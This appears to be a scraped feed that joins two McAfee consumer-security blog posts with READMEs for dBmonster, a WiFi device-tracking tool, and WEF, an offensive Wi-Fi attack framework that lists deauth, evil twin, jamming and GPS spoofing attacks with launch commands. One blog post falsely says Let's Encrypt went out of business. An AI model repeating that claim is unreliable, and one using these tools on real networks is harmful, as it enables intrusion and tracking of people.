1. Use Multi-Factor Authentication When It’s Offered – Always! 

Multi-Factor Authentication (MFA) or 2 Factor Authentication (2FA) is a no-brainer because it makes a hacker’s life a lot harder. In short, it requires the user to provide two or more verification factors to gain access to an account or app. This might be a text, email or even a code generated by an authentication app. So, even if a hacker has your password and username, they still need that final piece of information before they can get their hands on your account! 

2. Use A Different (and Complex) Password On Every Account 

Now this may take a bit of work to set up but using a unique and complex password on every account is one of the best things you can do to protect your online identity. And here’s the rationale – if you use the same password on all your accounts and your login details are stolen then hackers have access to all the accounts that are accessed with that password. Yikes!!! So, a unique password for each account is a great measure. I love using a password manager to make this process a little easier. Not only do they generate complex passwords, but they remember them too! All you need to do is remember your Master Password which needs to be extremely complex!!! 

3. Keep Your Devices and Software Updated & Backed-Up 

Updates are most commonly about addressing security weaknesses. And yes, I know they can be a pain but if you ignore them, you are essentially making it easier for hackers to find their way into your life via weak spots. And don’t forget to ensure your security software remains updated too!   

I always recommend keeping a backup of all your important info in case something goes wrong. This should include all your photos, key documents and all your personally identifiable information. A hard drive works well but saving to the cloud is also a good option. I once dropped a hard drive and lost treasured family photos, so the cloud is my personal preference. 

4. Stay Ahead of The Threats – Invest in a Security & Identity Protection Solution  

We all know knowledge is power so investing in top notch security and identity monitoring software will help keep you ahead of threats. McAfee+, McAfee’s new all in one privacy, identity and device protection solution is a fantastic way for Aussies to protect themselves online. It features identity monitoring and a password manager but also an unlimited VPN, a file shredder, protection score and parental controls. And the Rolls Royce version called McAfee+ Advanced, also offers subscribers additional identity protections including access to licensed restoration experts who can help you repair your identity and credit, in case you’re affected by a data breach. It also gives subscribers access to lost wallet protection which help you cancel and replace your ID, credit cards if they are lost or stolen. 

5. Only Use Secure Wi-Fi or a VPN 

Public, unsecured Wi-Fi can make life so much easier when you’re out and about but it’s also a tried and tested way for scammers to access your personal information. Unsecured Wi-Fi is free Wi-Fi that is available in public places such as libraries, cafes, or shopping centres. So, instead of using Wi-Fi, just use the data in your phone plan. Or alternatively invest in a Virtual Private Network (VPN) that cleverly encrypts everything you share on your device.   

About 2 months ago, I embarked on a project to clean up my online life. I’m working through the list of sites I have accounts with and am closing those I no longer use, I’m also doing a huge password audit to ensure they are all unique to each site and are super complex, thanks to my password manager. Now, I’m not quite done yet, but things are in better shape than they were. Why not consider doing the same? With the holiday season fast approaching, why not dedicate a little of your poolside time to practicing a little cyber hygiene. 

Till next time, keep those identities safe! 

Alex    

The post The Best Way To Protect Your Online Identity appeared first on McAfee Blog.

“This Connection Is Not Private” – What it Means and How to Protect Your Privacy

Have you ever been browsing online and clicked a link or search result that took you to a site that triggers a “your connection is not private” or “your connection is not secure” error code? If you’re not too interested in that particular result, you may simply move on to another result option. But if you’re tempted to visit the site anyway, you should be sure you understand what the warning means, what the risks are, and how to bypass the error if you need to.   

What does “this connection is not private” mean?

A “your connection is not private” error means that your browser cannot determine with certainty that a website has safe encryption protocols in place to protect your device and data. You can bump into this error on any device connected to the internet — computer, smartphone, or tablet.  

So, what exactly is going on when you see the “this connection is not private” error?  

For starters, it’s important to know that seeing the error is just a warning, and it does not mean any of your private information is compromised. A “your connection is not private” error means the website you were trying to visit does not have an up-to-date SSL (secure sockets layer) security certificate. 

Website owners must maintain the licensing regularly to ensure the site encryption capabilities are up to date. If the website’s SSL certificate is outdated, it means the site owners have not kept their encryption licensing current, but it doesn’t necessarily mean they are up to no good. Even major websites like LinkedIn have had momentary lapses that would throw the error. LinkedIn mistakenly let their subdomain SSL certificates lapse.  

In late 2021, a significant provider of SSL certificates, Let’s Encrypt, went out of business. When their root domain officially lapsed, it created issues for many domain names and SSL certificates owned by legitimate companies. The privacy error created problems for unwitting businesses, as many of their website visitors were rightfully concerned about site security.  

While it does not always mean a website is unsafe to browse, it should not be ignored. A secure internet connection is critical to protecting yourself online. Many nefarious websites are dangerous to visit, and this SSL certificate error will protect you from walking into them unaware.   

SSL certification standards have helped make the web a safer place to transact. It helps ensure online activities like paying bills online, ordering products, connecting to online banking, or keeping your private email accounts safe and secure. Online security continues to improve with a new Transport Layer Security (TLS) standard, which promises to be the successor protocol to SSL. 

So be careful whenever visiting sites that trigger the “connection is not private” error, as those sites can potentially make your personal data less secure and make your devices vulnerable to viruses and malware.  

Note: The “your connection is not private” error is Google Chrome‘s phrasing. Microsoft Edge or Mozilla Firefox users will instead see a “your connection is not secure” error as the warning message.   

How to fix the “connection is not private” error

If you feel confident that a website or page is safe, despite the warning from your web browser, there are a few things you can do to troubleshoot the error.  

• Refresh the page. In some cases, the error is just a momentary glitch. Try reloading the page to rule out a temporary error.  
• Close browser and reopen. Closing and reopening your web browser might also help clear a temporary glitch.  
• If you’re on public WiFi, think twice. Hackers often exploit public WiFi because their routers are usually not as secure or well-maintained for security. Some public WiFi networks may not have an SSL connection, or they may limit your access to websites. You can safely browse more securely in public spaces if you have an antivirus software or virtual private network (VPN) solution. 
• Use “Incognito” mode. The most used browsers (Google Chrome browser, Mac‘s Safari, Mozilla Firefox, and Microsoft Edge) offer an “Incognito mode” that lets you browse without data collecting in your history or cache. Open the site in a new incognito window and see if the error still appears.  
• Clear the cache on your browser. While cookies make browsing the web more convenient and personalized, they also can hold on to sensitive information. Hackers will take advantage of cached data to try and get passwords, purchase information, and anything else they can exploit. Clear browsing data before going to a site with the “connection is not secure” error to help limit available data for hackers.  
• Check the computer’s date and time. If you frequently see the “connection is not private” error, you should check and ensure your computer has the accurate time and date. Your computer’s clock can sometimes have time and date stamp issues and get glitchy in multiple ways. If it’s incorrect, adjust the date and set the time to the correct settings.  
• Check your antivirus software. If your antivirus software is sensitive, you may have to disable it momentarily to bypass the error. Antivirus software protects you, so you should be careful to remember to turn the software back on again after you’ve bypassed the error.  
• Be sure your browsers and operating systems are up to date. You should always keep your critical software and the operating system fully updated. An outdated browser can start getting buggy and can increase the occurrence of this kind of error.  
• Research the website. Do a quick search for the company of the website you wish to visit and make sure they are a legitimate business. You can search for reviews, Better Business Bureau ratings, or check for forums to see if others are having the same issue. Be sure you are spelling the website address correctly and that you have the correct URL for the site. Hackers can take advantage of misspellings or alternative URLs to try and snare users looking for trusted brands. 
• If it’s not you, it’s them. If you’ve tried all the troubleshooting techniques above and you still see the error, the problem is likely coming from the site itself. If you’re willing to take your chances (after clearing your browser’s cache), you can click the option to “proceed to the domain,” though it is not recommended. You may have to choose “advanced settings” and click again to visit the site.   

Remember, you are taking your chances anytime you ignore an error. As we mentioned, you could leave yourself vulnerable to hackers after your passwords, personal information, and other risks.  

How to protect your privacy when browsing online

Your data and private information are valuable to hackers, so they will continue to find new ways to try and procure it. Here are some ways to protect yourself and your data when browsing online.  

• Antivirus solutions are, hands down, your best line of protection against hacking. Solutions like McAfee+ Ultimate offer all the tools you need to secure your data and devices.  
• Use strong passwords and two-factor authentication when available. 
• Delete unused browser extensions (or phone apps) to reduce access. 
• Always keep your operating system and browsers up-to-date. You can open system preferences and choose to update your system automatically. 
• Use a secure VPN solution to shield your data when browsing. 
• Use your favorite browser’s incognito mode to reduce the data connected to your devices. 
• Remove any 3rd party apps from your social media accounts — especially if you’ve recently taken a Facebook quiz or similar (also, don’t take Facebook quizzes). 
• Engage the highest privacy settings in each of your browsers. 
• Always check the address bar for HTTPS before sharing credit cards or other sensitive data on a website. 
• Share less personal and private information on social media.  

Discover how McAfee keeps you and your data safe from threats

As we continue to do more critical business online, we must also do our best to address the risks of the internet’s many conveniences.  

A comprehensive cybersecurity tool like McAfee+ Ultimate can help protect you from online scams, identity theft, and phishing attempts, and ensure you always have a secure connection. McAfee helps keep your sensitive information out of the hands of hackers and can help you keep your digital data footprints lighter with personal data cleanup.  

With McAfee’s experts on your side, you can enjoy everything the web offers with the confidence of total protection. 

The post “This Connection Is Not Private” – What it Means and How to Protect Your Privacy appeared first on McAfee Blog.

dBmonster - Track WiFi Devices With Their Recieved Signal Strength

With dBmonster you are able to scan for nearby WiFi devices and track them trough the signal strength (dBm) of their sent packets (sniffed with TShark). These dBm values will be plotted to a graph with matplotlib. It can help you to identify the exact location of nearby WiFi devices (use a directional WiFi antenna for the best results) or to find out how your self made antenna works the best (antenna radiation patterns).

Features on Linux and MacOS

Installation

git clone https://github.com/90N45-d3v/dBmonster
cd dBmonster

# Install required tools (On MacOS without sudo)
sudo python requirements.py

# Start dBmonster
sudo python dBmonster.py

Has been successfully tested on...

* should work on any MacOS or Debian based system and with every WiFi card that supports monitor-mode

Troubleshooting for MacOS

Normally, you can only enable monitor-mode on the internal wifi card from MacOS with the airport utility from Apple. Somehow, wireshark (or here TShark) can enable it too on MacOS. Cool, but because of the MacOS system and Wireshark’s workaround, there are many issues running dBmonster on MacOS. After some time, it could freeze and/or you have to stop dBmonster/Tshark manually from the CLI with the ps command. If you want to run it anyway, here are some helpful tips:

Kill dBmonster, if you can't stop it over the GUI

Look if there are any processes, named dBmonster, tshark or python:

sudo ps -U root

Now kill them with the following command:

sudo kill <PID OF PROCESS>

Stop monitor-mode, if it's enabled after running dBmonster

sudo airport <WiFi INTERFACE NAME> sniff

Press control + c after a few seconds

* Please contact me on twitter, if you have anymore problems

Working on...

• Capture signal strength data for offline graphs
• Generate graphs from normal wireshark.pcapng file
• Generate multiple graphs in one coordinate system

Additional information

• If the tracked WiFi device is out of range or doesn't send any packets, the graph stops plotting till there is new data. So don't panic ;)
• dBmonster wasn't tested on all systems... If there are any errors or something is going wrong, contact me.
• If you used dBmonster on a non-listed Platform or WiFi Adapter, please open an issue (with Platform and WiFi Adapter information) and I will add your specification to the README.md

WEF - Wi-Fi Exploitation Framework

A fully offensive framework to the 802.11 networks and protocols with different types of attacks for WPA and WEP, automated hash cracking, bluetooth hacking and much more.

• I recommend you my alfa adapter: Alfa AWUS036ACM, which works really great with both, 2.4 and 5 Ghz

Tested and supported in Kali Linux, Parrot OS, Arch Linux and Ubuntu

*However it's not finished and may have issues, try it at your own risk.*

If you have any issue please, contact me or create a issue

SUPPORTED ATTACKS:

• Deauthentication Attack
• Authentication Attack
• Beacon Flood Attack
• PKMID Attack
• EvilTwin Attack
• Passive/Stealthy Attack
• Pixie Dust Attack
• Null Pin Attack
• Chopchop Attack
• Replay Attack
• Michael Exploitation Attack
• Caffe-Latte Attack
• Jamming, Reading and Writing bluetooth connections
• GPS Spoofing with HackRF

FEATURES:

USAGE:

Common usage of the framework

wef -i wlan0 # Your interface name might be different

or

wef --interface wlan0

Once the application is working, type 'help' to view more functions and useful info.

If you don't want to scan APs with every attack you can do something like this:

set name my-wifi # To especify the name to attack
set time 60 # To define the total duration of the attacks that ask for the time
set packets 15 # To define the amount of packets that some attacks will send

REQUIREMENTS:

Don't install them manually, WEF takes care of that if you don't already have them

aircrack-ng
reaver
mdk4
macchanger
hashcat
xterm
hcxtools
pixiewps
python3
btlejack
crackle
php
hostadp
dnsmasq

INSTALLATION:

Checkout the Wiki

DEMO:

Demo on a Parrot OS with Kitty terminal

Created by D3Ext

Extra

If you are using bspwm, you can add this line to your bspwmrc for launching the xterm windows always beeing in floating mode (for a prettier design)

bspc rule -a XTerm state=floating

Copyright © 2022, D3Ext